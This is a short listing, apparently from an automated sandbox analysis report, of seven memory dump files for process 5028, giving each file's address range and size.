-
memory/5028-23-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/5028-12-0x00000266C7510000-0x00000266C7586000-memory.dmpFilesize
472KB
-
memory/5028-29-0x00000266E79F0000-0x00000266E7E8E000-memory.dmpFilesize
4.6MB
-
memory/5028-7-0x00000266C7230000-0x00000266C7252000-memory.dmpFilesize
136KB
-
memory/5028-6-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/5028-5-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB
-
memory/5028-111-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmpFilesize
1.9MB